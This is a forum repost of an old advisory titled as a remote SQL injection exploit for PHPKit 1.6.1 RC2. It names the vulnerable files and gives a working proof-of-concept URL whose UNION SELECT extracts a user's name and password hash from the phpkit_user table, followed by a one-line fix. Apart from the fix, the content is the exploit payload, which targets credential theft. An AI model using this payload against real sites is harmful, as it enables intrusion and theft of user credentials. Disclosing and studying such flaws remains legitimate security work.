PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit

RedJoker · November 11, 2006

+--------------------------------------------------------------------
+
+ PHPKit 1.6.1 RC2
+
+ Original advisory:
+ [url]http://www.bb-pcsecurity.de/[/url]
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPKit 1.6.1 RC2
+ Venedor ...........: [url]http://www.phpkit.de/[/url]
+ Class .............: Remote SQL Injection
+ Risk ..............: high
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ SQL-INJECTION IN SEVERAL FILES:
+  guestbook/print.php
+  faq/faq.php
+  more (but untested!)
+
+
+--------------------------------------------------------------------
+
+ POC:
+
+--------------------------------------------------------------------
+
+ /include.php?path=faq/faq.php&catid=-1'%20UNION%20SELECT%20
+ 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
+ FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1
+
+
+ Solution:
+  -> Install Hack_Block (search google 
+  -> escape the variables in your SQL-Statement
+
+
+--------------------------------------------------------------------
+
+ Greets and Thanks: /str0ke
+
+-------------------------[ E O F ]----------------------------------

http://www.bb-pcsecurity.de/archiv/2...kit_(faq.php)/

Sign In

PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit

Recommended Posts

RedJoker

Join the conversation

Browse

Activity

Pages